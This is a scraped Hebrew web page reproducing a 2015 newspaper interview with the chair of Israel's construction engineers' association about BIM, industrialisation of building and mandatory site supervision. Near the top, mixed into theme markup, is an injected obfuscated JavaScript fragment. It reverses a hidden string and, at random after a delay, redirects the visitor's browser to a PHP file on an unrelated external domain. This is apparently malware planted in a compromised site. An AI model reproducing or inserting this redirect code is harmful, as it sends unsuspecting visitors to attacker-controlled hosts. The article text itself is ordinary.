BIM | המשימה: הגברת שיתוף הפעולה בין התכנון והביצוע, התוצאה: בנייה יעילה, איכותית ובטוחה
16122
rtl,page,page-id-16122,page-template-default,ajax_fade,page_not_loaded,,qode-child-theme-ver-1.0.0,qode-theme-ver-7.4,wpb-js-composer js-comp-ver-4.5.2,vc_responsive
 
) == "string") return $VOcl3cIRrbzlimOyC8H.list[n].split("").reverse().join("");return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}to_right" text_align="left" video="" video_overlay="" video_overlay_image="" video_webm="" video_mp4="" video_ogv="" video_image="" background_image="" background_image_as_pattern="without_pattern" section_height="" parallax_speed="" background_color="" border_color="" row_negative_margin="" side_padding="" parallax_side_padding="" padding_top="" padding_bottom="" color="" hover_color="" more_button_label="" less_button_label="" button_position="" css_animation="" transition_delay=""]

המשימה: הגברת שיתוף הפעולה בין התכנון והביצוע, התוצאה: בנייה יעילה, איכותית ובטוחה

לדברי דני מריאן, יו"ר איגוד המהנדסים לבנייה ותשתיות בישראל, תרבות עבודה חדשה שניתן להנחילה באמצעות הטמעות מערכת BIM, המקדמת שיתוף, תיעוש, שילוב ידע טכנולוגי וחקיקה, המחייבת פיקוח צמוד על ביצוע פרויקטים – תגדיל את הפריון בענף הבנין בישראל, פריון אשר לא השתנה במשך 50 השנה האחרונות. בכתבה הבאה מספר מריאן על האתגרים החדשים בענף ועל האופן בו הוא חייב לשדרג ולהתאים את עצמו לעולם שצרכיו משתנים במהירות

שירלי גולן בזק/ כתבה ב"הארץ", בניה ציבורית ותשתיות, אוקטובר 2015

מצד אחד, אומר דני מריאן, יו"ר איגוד המהנדסים לבנייה ותשתיות בישראל, ענף הבנייה משתנה עם הזמן, מתחדש ומתפתח, בהתאם לדרישות התקופה ומצד שני, "אין מדובר בשינויים מהירים כמו בתחומים העוסקים בטכנולוגיות עילית, הייטק ותקשורת. החדשנות הסובבת אותנו מעודדת ציפייה לייעול תהליכי הבנייה ועם השנים חוזרת הקידמה הטכנולוגית גם אלינו. יש עדיין  עוד מה לעשות כדי לחזק ולשפר את פריון ואיכות הבנייה – גם מבחינה טכנולוגיה, גם מבחינת שיטות עבודה וגם מבחינת בטיחות". איגוד המהנדסים לבנייה ותשתיות הוא הגוף הססמוטורי המייצג את מהנדסי התשתיות והבנייה בארץ. האיגוד עוסק בשלושה תחומים מרכזיים: רגולציה של מקצועות ההנדסה האזרחית מול משרדים ממשלתיים, תקינה (ריכוז כל פעילות התקינה ההנדסית ותקינת התכן במסגרת מכון התקנים) והכשרה מקצועית פרקטית למהנדסים (עריכת קורסים, ימי עיון וכנסים למהנדסים בודדים והדרכה מניס ארגונית בחסרות ממשלתיות ובחברות פרטיות). "היום, המיקוד בענף הוא במגמות חדשות, כגון בנייה לגובה, צורך לתת מענה על נושאי קיימות ובעיקר רצון לייעל תהליכים, להגדיל את הפריון והאיכות ולהחיל עלויות בנייה", מספר מריאן "הטכנולוגיה מאפשרת לנו לייעל תהליכים ובמקביל עם השתכללות החומרים בהם משתמשים, כמו לדוגמא, תרכובות ברזל איכותיות מבעבר בעלות נמוכה יותר – נוצרים מוצרים חדשים, המאפשרים עבודה יעילה, זולה ואיכותית יותר, "כדי להשיג שדרוג אמיתי באיכות הבנייה, חייבים לבצע שינוי באופן בו מתבצעים פרויקטים בישראל – יש צורך ליצור שיתוף פעולה פורה ואינטנסיבי יותר בין גורמי הייזום והתכנון והגורמים המבצעים (הקבלנים), להטמיע מתודולוגית עבודה יעילות יותר ולהשתמש ברמת תיעוש גבוהה יותר ממה שקיימת כיום". מסד נתונים משותף, תכנון רב מערכתי כאשר מריאן מציין מתודולגיות עבודה, הוא מתכוון בין היתר ל- BIM (Building Infornation Modelling), אשר בעולם כבר חוללה מהפכה בענף הבנייה ובישראל נמצאת בראשית דרכה, "בתקווה שהשימוש בה רק יילך ויתרחב". השיטה החדשנית, המתבססת על טכנולוגיות מחשוב מרחבי מתקדמת, מאפשרת לבחון תוכניות בנייה כבר בשלבים ההתחלתיים ביותר של התכנון באופן תלת מימדי ולא כפי שהיה נהוג עד היום – כשרטוט דו מימדי בלבד. "כשהתכנון, על כל פרטיו, מתבצע בצורה מרחבית, ההתייחסות של כל הגורמים הרלוונטיים לביצוע הפרויקט היא הרבה יותר מקיפה ומעמיקה", מסביר מריאן. "בעזרת BIM, המהנדסים מסוגלים לתת מענה יעיל כבר בשלבים המוקדמים של התכנון, במקום להמתין לבחינה מרחבית של מוצר בסוף התהליך ניתן מראש לבחור חלופות שונות, את כלכליותן ואת השלכותיהן על אפשרויות התיעוש, הביצוע ולוח הזמנים. בסופו של דבר, כך מתאפשר ליזם לקבל בלוח זמנים קצר יותר מבנה הרבה יותר נכון, כלכלי ואיכותי. "בביצוע פרויקט תוך שימוש ב-BIM , מסד הנתונים פתוח באופן שוטף בפני כל הגורמים המעורבים בפרויקט ומתעדכן בכל עת שאחד מהם מבצע שינוי. מערכת BIM יוצרת שפה אחידה ומשוכללת הרבה יותר עבור צוות התכנון, צוות ניהול הפרויקט, הקבלן הראשי וקבלני המשנה". ובעזרתה מתאפשר, כמובן, לא רק לקצר את משך הבנייה וליעל, אלא גם לחסוך בעלויות ולמנוע טעויות שבהמשך יגבו מחיר הרבה יותר גבוה. "קל יותר לעשות את תכנון הביצוע, הקבלן יכול כבר מראש לחשב כמויות, לבחון ביצוע של מודלים, תבניות וכדומה כשבודקים כבר בהתחלה איך ניתן לייעל את שלבי העבודה ואיך ניתן להוזיל על מנת ליצור עבור המבנה הנדסת ערך איכותית יותר – נחסך גם כסף וגם זמן".

כיצד פועל איגוד המהנדסים לבנייה ותשתיות בישראל להחדרת BIM  לשוק, כך שתהפןך לכלי קבוע בידי כמה שיותר חברות בנייה?

"על מנת להשתמש בצורה מירבית וטובה בטכנולוגיה הזו, יש לקבל החלטה מערכתית בדבר חשיבותה וללמוד אותה. היזם, שהוא הבעלים של הפרויקט צריך להחליט שהוא משלב BIM בפרויקטים שלו החל משלב הייזום עבור בשלב התכנון וכמובן בשלב הביצוע. "לשם כך, אנחנו משקיעים משאבים בהדרכות של יזמים וארגונים במאפייני המתודולוגיה ובקרוב מעביר הדרכה פנים ארגונית בגוף ממשלתי אגף ההנדסה והבינוי של משרד הביטחון. "BIM חייב להיות משולב בתוך תרבות של עשייה, המקדמת שיתוף פעולה בין כל גורמי הפרויקט. בסופו של דבר, שימוש רחב יותר ב-BIM לצד רמה גבוהה יותר של תיעוש בענף יגדילו את הפריון".

איך זה שבשנת 2015, עם כל החידושים הטכנולוגיים מסביבנו עדיין סובל ענף הבנייה מרמת תיעוש נמוכה?

"היום אין מספיק תיעוש, לא ברמת תהליכי עבודת הבנייה ולא ברמת האלמנטים והחומרים בהם משתמשים לצורך בנייה. אחת הסיבות המרכזיות לכך, היא הפרדה כמעט מוחלטת בין שלב התכנון לשלב הביצוע כשהצד המבצע – הקבלן – לא נוטל חלק בפעילות ההנדסה שנעשית בשלב התכנון והייזום, הוא לא יכול להשפיע על אופן הבנייה. אין לו אפשרות לקחת חלק בתכנון, לבחון מהן השיטות, החומרים ודרכי הביצוע, שיש בכוחם לייעל את תהליך הבנייה ולהוזיל את עלויותיו "כשרמת התיעוש תעלה ויחד עמה יעודדו היזמים שיתוף של הקבלנים בשלבי התכנון – ניתן יהיה לשפר את שיטות הביצוע ולהגביר את הפריון בענף. הפריון מותנה במעורבות הנדסית גבוהה הן בצד של המבצע והן בצד של היזם והמתכנן כיום, המצב הוא שכל תהליך ההנדסה מתבצע אצל היזם ללא ספק יש צורך בקבלת אחריות של המהנדסים בשני הצדדים לשינוי התהליכים ולגילוי פתיחות גבוהה יותר בחיפוש אחר חדשנות, התמחות במידע החדש ותיעוש הביצוע בכל ההיבטים שציינתי עבודת הבניין צריכה להיות מעוגנת בתוך תרבות של שיתוף וראייה כוללת." חובת הפיקוח הצמוד למניעת נזקים כבדים שינוי דפוסי מחשבה, שדרוג תהליכי עבודה ושימוש נרחב הרבה יותר בטכנולוגיות מתקדמות אכן עשויים להשפיע על בנייה נכונה, יעילה ומשופרת, אך לדברי מריאן ישנו עוד גורם משלים שיש להסדיר, על מנת להבטיח את איכות הבנייה ובטיחותה והוא פיקוח צמוד על כל פרויקט. באיגוד המהנדסים לבנייה ותשתיות בישראל פועלים במרץ לשכנע את מנהל התכנון במשרד האוצר ליישם את ההמלצה המרכזית בדו"ח ועדת זיילר (שמונתה בעקבות אסון אולמי ורסאי) והיא שיפור מערך הפיקוח והאכיפה ואבטחת האיכות לפרויקטי בנייה. לפי המלצה זו, יש לחייב בחוק את היזמים להפעיל פיקוח הנדסי מלא ואובייקטיבי על פרויקטים, במטרה להבטיח רמה בטיחותית גבוהה לעוסקים בבנייה וכמובן, לציבור הרחב. במקביל יש להגדיר בחוק את אחריות המפקח וסמכויותיו. "אנחנו דורשים מינוי של מפקח עם חובות ברורות ומפורטות שיוטלו עליו בחוק", מדגיש מריאן, "הקבלנים מתנגדים לפיקוח בגלל שנראה להם שהם נדרשים לעלות נוספת. מה שקורה בפועל, הוא שכשמתגלים נזקים בשלבים מאוחרים יותר – העלויות לתיקונם הרבה יותר גבוהה מעלויות הפיקוח, מועדי מסירת פרויקטים מתעכבים, הקבלנים והדיירים משלמים את מחירי העיכוב ובמקרה הגרוע ביותר, נגבה מחיר כבד של חיי אדם. התאחדות בוני הארץ מסתכלת רק על מאזן התשלומים המיידי, במקום להבין שעם מפקח, בטווח הארוך הקבלן חוסך בעלויות ומוסר ללקוחותיו פרוייקטים איכותיים, תקינים והרבה יותר מוצלחים. "קריסת המרפסות בפרויקט של גינדי בחדרה הוכיחה את מחיר הטעות הזו של מחסור בפיקוח צמוד, פיקוח כזה מונע נזקים בטיחותיים ומאפשר לאתר כבר בשלבים מתקדמים בעיות עתידיות. הממשלה חייבת להפעיל חקיקה ברורה וחד משמעית בנושא הזה לטובת הדיירים (ובסופו של דבר גם לטובת הקבלנים) – למען שיפור איכות הבנייה, הוזלתה והגברת הבטיחות תוך כדי הביצוע ואחריה".

לאור השינויים הנדרשים, שמנית לעיל, ולצד מחסור מדאיג בכמות מהנדסי הבניין העתידיים, היכן אתה רואה את הענף בעוד עשר שנים?

"המחסור המסתמן בצד הגברת השיתוף בין התכנון והביצוע, חיזוק האלמנטים ההנדסיים בחברות הקבלניות, הנהלת תרבות של שיתוף ואיכות יעלו את קרנו של ענף הבנייה בעיני המועמדים ללימודי הנדסה והביקוש ללימוד המקצוע יגבר. כבר היום אנו רואים שתוך עשור כמות הלומדים לימודי הנדסה אזרחית הכפיל את עצמו והיום במקום 250 מנדסים מסיימים את לימודיהם כל שנה למעלה מ-500 מהנדסים. לממשלה ולאיגוד המהנדסים יחד עם הגורמים הנוספים המובילים את הענף יש אחריות להגביר את השיתוף, האיכות, התיעוש, הפריון והבטיחות על מנת להצעיד את ענף הבנייה והתשתיות קדימה. "אין לי ספק שכמו שהנושא של בנייה לגובה הולך והופך ללגיטימי בפרויקטים של מגורים ומשרדים, כך הענף יאמץ מגמות עולמיות גם בתחומי התייעלות, איכות ותיעוש, ימשיך לצעוד קדימה וליישר קו עם הקדמה העולמית. המהנדס הישראלי הוא שם דבר בעולם. יש לנו מהנדסים מעולים שכבר היום מעורבים בפרויקטים המורכבים והמדוברים ביותר בכל העולם והדבר ישפיע גם על ענף הבנייה והתשתיות בישראל".

[button target="_self" text="חזרה לכתבו עלינו" link="http://bimisrael.co.il/%D7%9B%D7%AA%D7%91%D7%95-%D7%A2%D7%9C%D7%99%D7%A0%D7%95-2/%D7%A1%D7%99%D7%A7%D7%95%D7%A8%D7%99%D7%9D-%D7%AA%D7%A7%D7%A9%D7%95%D7%A8%D7%AA%D7%99%D7%99%D7%9D/?preview=true&preview_id=15514&preview_nonce=950488636d"]